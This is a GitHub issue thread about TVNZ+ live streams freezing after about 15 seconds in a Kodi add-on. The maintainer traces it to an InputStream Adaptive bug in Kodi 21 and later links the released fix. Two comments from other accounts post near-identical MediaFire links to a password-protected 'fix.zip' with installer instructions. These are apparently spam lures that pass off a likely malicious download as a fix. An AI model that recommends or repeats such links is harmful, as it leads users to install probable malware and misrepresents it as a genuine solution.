### ISSUE TITLE
TVNZ+ live streams freezing after 15 seconds of playback

### ISSUE THREAD

**Issue by Topspin226** [matthuisman/slyguy.addons#876]
I'm having a weird issue with TVNZ+ live streams freezing after about 15 seconds of playback. The buffering circle graphic comes up at 2% and the stream freezes every single time. The issue happens identically on all the live streams that I've tested. I'm running the latest version of Kodi (21.1) on MacOS. I am using a VPN, however I don't think this is causing the issue. I think playback would fail completely if the problem was due to the VPN. I also don't think it has anything to do with the server side ad injection, as the freezing doesn't happen during ad breaks. I have tried disabling InputStream Adaptive, but this makes no difference. 

Any ideas as to what might be causing this to happen? 

<img width="1728" alt="Screen Shot 2024-08-28 at 3 42 49 pm" src="https://github.com/user-attachments/assets/217350bc-b516-42b3-b802-93191b2ea6a8">

**Comment by Topspin226** [comment]
Thanks for the info Matt. Does the IPTV NZ addon have all the live event feeds for the sport like the US Open Tennis, or does it just have the three live channels?

**Comment by matthuisman** [comment]
Oh just linear channels. You could use Kodi 20 as it's inputstream adaptive
doesn't have the same bug

**Comment by Topspin226** [comment]
No worries Matt. I will give Kodi 20 a try tomorrow. Thanks for your help, and all your good work with these addons.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by matthuisman** [comment]
the fixed inpustream adapative for Kodi 21 has now been released
https://github.com/xbmc/inputstream.adaptive/commit/96e7ac1fbe1ea05e06e84b74d36b5c5e00002cf5
21.5.4
